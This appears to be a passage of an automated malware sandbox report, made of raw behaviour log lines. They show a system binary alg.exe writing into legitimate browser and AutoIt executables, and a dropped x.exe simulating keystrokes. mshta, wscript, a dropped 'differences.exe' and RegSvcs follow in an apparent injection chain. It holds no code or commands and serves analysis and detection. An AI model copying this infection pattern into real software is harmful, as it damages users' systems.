Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 166400
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739916
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739840
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 21924
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 185856
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 759372
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 759296
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 25840
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 1624576
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 2198092
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 2198016
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 89651
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe offset: 0
Source: C:\Windows\System32\alg.exe | File written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe offset: 0
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_004048D7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00485376
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00423187
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
